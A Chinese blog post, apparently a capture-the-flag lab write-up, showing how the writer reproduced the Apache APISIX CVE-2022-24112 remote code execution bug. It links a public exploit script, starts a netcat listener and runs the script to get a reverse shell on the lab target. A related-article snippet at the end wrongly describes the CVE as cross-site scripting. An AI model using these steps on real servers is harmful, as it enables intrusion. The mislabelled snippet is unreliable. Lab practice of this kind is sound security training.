春秋云镜 CVE-2022-24112

最新推荐文章于 2024-08-30 13:17:29 发布
最新推荐文章于 2024-08-30 13:17:29 发布
阅读量313 收藏
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/131624997
版权

春秋云镜 CVE-2022-24112 Apache APISIX batch-requests SSRF RCE 漏洞

靶标介绍

Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于OpenResty和etcd来实现,具备动态路由和插件热加载,适合微服务体系下的API管理。 APISIX中存在远程代码执行漏洞,该漏洞源自产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,很容易导致远程代码执行。

启动场景

在这里插入图片描述

漏洞利用

poc

https://github.com/Acczdy/CVE-2022-24112_POC

vps监听 nc -lvvp 18888
执行poc脚本

python3 CVE-2022-24112_Windows_by_M4xSec.py eci-2zegg792x6hblhk7mhpo.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODR

在这里插入图片描述

反弹shell执行命令
在这里插入图片描述

得到falg

flag{8f97c852-861f-4b1c-a11b-4dc2af568749}

isbug0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112
ApacheAPISIX的博客
02-12 5501
在 Apache APISIX 2.12.1 之前的版本中(不包含 2.12.1 和 2.10.4),启用 Apache APISIXbatch-requests 插件之后,会存在改写 X-REAL-IP header 风险。
CVE-2022-24112 Apache APISIX 远程代码执行漏洞
ALLEN'Blog
01-30 448
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
[春秋云镜]CVE-2022-24112
niubi707的博客
12-04 5963
春秋云镜CVE-2022-24112Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋云境:CVE-2022-24112
一只爱吃橙子的羊
12-04 2603
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
i春秋云镜CVE-2022-24112
qq_29060627的博客
04-29 421
【代码】i春秋云镜CVE-2022-24112
CVE-2022-24112/POC
LinuxK的博客
08-13 237
python3 poc2.py -t eci-2zecqo925diajhkbbasa.cloudeci1.ichunqiu.com(春秋云镜打开的靶场地址,有端口加后面参数-p后面) -p 9080 -L。1,使用隧道代理软件将本地端口如8888映射到公网访问(自行百度这里不能说)4,然后在本地监听的netcat里cat /flag即可。2,使用netcat -lvnp 8888监听本地端口。+隧道代理的公网ip端口。+隧道代理的公网ip。
CVE-2022-24112 Apache APISIX 命令执行漏洞复现
Love&Share
04-07 3435
如果用户使用 Apache APISIX 默认配置(启用 Admin API ,使用默认 Admin Key 且没有额外分配管理端口),攻击者可以通过 batch-requests 插件调用 Admin API ,导致远程代码执行。Apache APISIX 是 Apache 软件基金会下的云原生 API 网关,它兼具动态、实时、高性能等特点,提供了负载均衡、动态上游、灰度发布(金丝雀发布)、服务熔断、身份认证、可观测性等丰富的流量管理功能。登陆后台可以看到其添加的一条路由列表,在。
[POC分享] CVE: 2022-24112:Apache APISIX 2.12.1 - Remote Code Execution (RCE)
「鸿渐之翼」的博客
04-22 925
攻击者可以滥用批处理请求插件发送请求以绕过 Admin API 的 IP 限制。Apache APISIX 的默认配置(使用默认 API 密钥)容易受到远程代码执行的影响。更改 admin key 或 Admin API 的端口更改为与数据面板不同的端口时,影响较小。但是绕过Apache APISIX的数据面板的IP限制还是有风险的。批处理请求插件中有一个检查,它用其真实的远程 IP 覆盖客户端 IP。但是由于代码中的错误,可以绕过此检查。
Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用
include_voidmain的博客
04-11 7802
0x01 什么是Apache APISIX Dashboard Apache APISIX 是一个动态、实时、高性能的开源 API 网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量,包括网关、Kubernetes Ingress 和服务网格等。 0x02 漏洞详情 漏洞编号:CVE-2022-24112 影响版本:Apache APISIX < 2.12.1 Apache APIS
漏洞复现-CVE-2022-24112 APISIX远程代码执行漏洞原理与复现
关注网络安全、云原生安全
07-15 1890
由于代码逻辑问题,没有覆盖为真实ip,导致绕过了请求限制,且发送请求有默认的key,通过发送请求注册路由,并使用batch-requests插件执行了命令。
2024年网络安全最全Apache Apisix网关系统历史漏洞复现分析_apache apisix 漏洞
05-03 1085
你可以把 Apache APISIX 当做流量入口,来处理所有的业务数据,包括动态路由、动态上游、动态证书、金丝雀发布(灰度发布)、限流限速、抵御恶意攻击、监控报警、服务可观测性、服务治理等。【创建路由】通过下面的命令,你将创建一个路由,把请求【部署 APISIX Dashboard】Apache APISIX Dashboard 是基于浏览器的可视化平台,用于监控、管理 Apache APISIX。。
Apache Apisix网关系统历史漏洞复现分析
道阻且长,行则将至。
02-18 2165
Apache APISIX 作为一个动态、实时、高性能的云原生 API 网关,提供了负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。本文总计、复现可 Apache APISIX 网关系统的几个历史 CVE 漏洞。
Apache APISIX 存在改写 X-REAL-IP header(CVE-2022-24112
做自己喜欢的事,并将其发挥到极致!
02-28 1103
一、风险概述 在 Apache APISIX 2.12.1 之前的版本中(不包含 2.12.1 和 2.10.4),启用 Apache APISIX batch-requests 插件之后,会存在改写 X-REAL-IP header 风险。 该风险会导致以下两个问题: 攻击者通过 batch-requests 插件绕过 Apache APISIX 数据面的 IP 限制。如绕过 IP 黑白名单限制。 如果用户使用 Apache APISIX 默认配置(启用 Admin API ,使用默认 Admin
Apache Druid远程代码执行漏洞复现(CVE-2021-25646)
A_dmin的博客
03-01 2368
Apache Druid远程代码执行漏洞复现(CVE-2021-25646) 漏洞描述 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 影响版本 Apache Druid < 0.20.1 漏洞环境以及复现 fofa搜索:title=“
Apache Druid命令执行漏洞(CVE-2021-25646)复现
weixin_46137328的博客
02-04 1454
0x00 漏洞概述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 包括执行用户提供的...
cve-2021-3156 POC漏洞利用方式以及修复办法
热门推荐
网站安全专家
01-28 1万+
临近2021春节年末,我们SINE安全监测中心发现Linux系统被爆出致命漏洞,导致大部分服务器受到黑客的攻击与入侵,该漏洞发生的根源是由于系统的管理命令。SUDO存在问题,导致普通用户无需输入root密码,可以直接使用sudo命令提权到root管理员权限,这漏洞是今年linux爆出的最大的漏洞,危害性极高,目前受漏洞影响的Linux版本是Linux Sudo1.8.2- 1.8.31p2 LinuxSudo1.9.0- 1.9.5 p1等版本,可以说是大多数的linux系统都有漏洞。目前我们已对SINE.
修复Apache Tomcat 信息泄露漏洞,漏洞编号:CVE-2021-24122
平庸
02-24 1万+
修复Apache Tomcat 信息泄露漏洞,漏洞编号:CVE-2021-24122
解锁.NET安全奥秘:敏感数据加密与哈希的深度揭秘
最新发布
qq_43535970的博客
08-30 708
在这篇博客中,我们深入探讨了如何在 .NET 应用程序中使用加密与哈希技术来保护敏感数据。文章从基础概念出发,详细介绍了对称加密与非对称加密的区别,如何安全地存储密码,以及使用 AES 进行数据加密与解密的具体实现。同时,文章还分享了密钥管理、安全通信等最佳实践,帮助开发者最大程度地保障数据安全。通过这篇指南,您将能够更好地理解并应用这些关键技术,为您的 .NET 应用构建坚实的安全基础。
春秋云镜CVE-2022-24112
08-21
春秋云镜CVE-2022-24112是一个安全漏洞的编号,全称为“Cross-Site Scripting (XSS)”,它通常发生在网站存在输入验证不足的情况下。攻击者通过恶意脚本注入到用户的请求中,当这些脚本被服务器作为有效内容返回给用户浏览器时,就会触发XSS攻击。这种漏洞可能导致未经授权的信息泄露、会话劫持或者对用户界面的控制权转移。为了修复这个漏洞,春秋云镜团队需要强化输入验证,防止恶意脚本被执行,并及时发布安全更新以保护用户的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值